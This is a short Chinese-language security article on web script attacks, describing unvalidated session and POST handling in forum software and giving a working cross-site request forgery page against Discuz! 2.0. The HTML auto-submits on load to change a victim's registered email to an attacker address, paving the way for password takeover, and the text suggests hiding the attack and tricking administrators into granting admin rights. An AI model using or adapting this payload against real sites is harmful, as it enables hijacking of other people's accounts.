网络安全 频道

探秘脚本攻击与类型

    三、一些别的脚本攻击

    有些程序没有对cookie或者session进行过滤和检查,就造成了用户可以非法修改提交页面,自己提交修改数据,比如像海阳顶端网木马的以前版本对session没有过滤,我们就可以饶过密码的验证来到达真正的页面,还有就是post提交的问题,像leadbbs的2.77版本就是没有充分的过滤,我们就可以把管理员的密码修改成自己的密码!

    还有一个脚本的攻击例子,在Discuz! 2.0 论坛里,因为个人属性缺乏必要的安全确认,所以很容易诱使其他会员自动修改其个人属性内容,特别是注册邮件信息,这关系着登陆密码的修改。
比如我们发个帖子,写上

    <html>
    <head>
    <script language="JavaScript">
    function postemail()
    {
    document.reg.submit();
    }

    </script>
    </head>
    <body onload="postemail()">
    <form method="post" action="_blank>http://xxx/memcp.php?action=profile"; name="reg">
    <input type="text" name="emailnew" size="25" value="crack.x.h@163.com">
    <input type="test" name="editsubmit" value="编辑个人资料">
    </form>
    </body>
    </html>

    诱使会员点击这个页面后,就会自动修改该会员注册的email地址为crack.x.h2163.com。当然为了隐蔽性,可以更新后自动关闭,然后调用另外一个假地址。

    当然我们也可以利用这个漏洞进行欺骗、隐藏来诱惑管理员来修改我们为管理员等等!大家自己去学习吧!

0
相关文章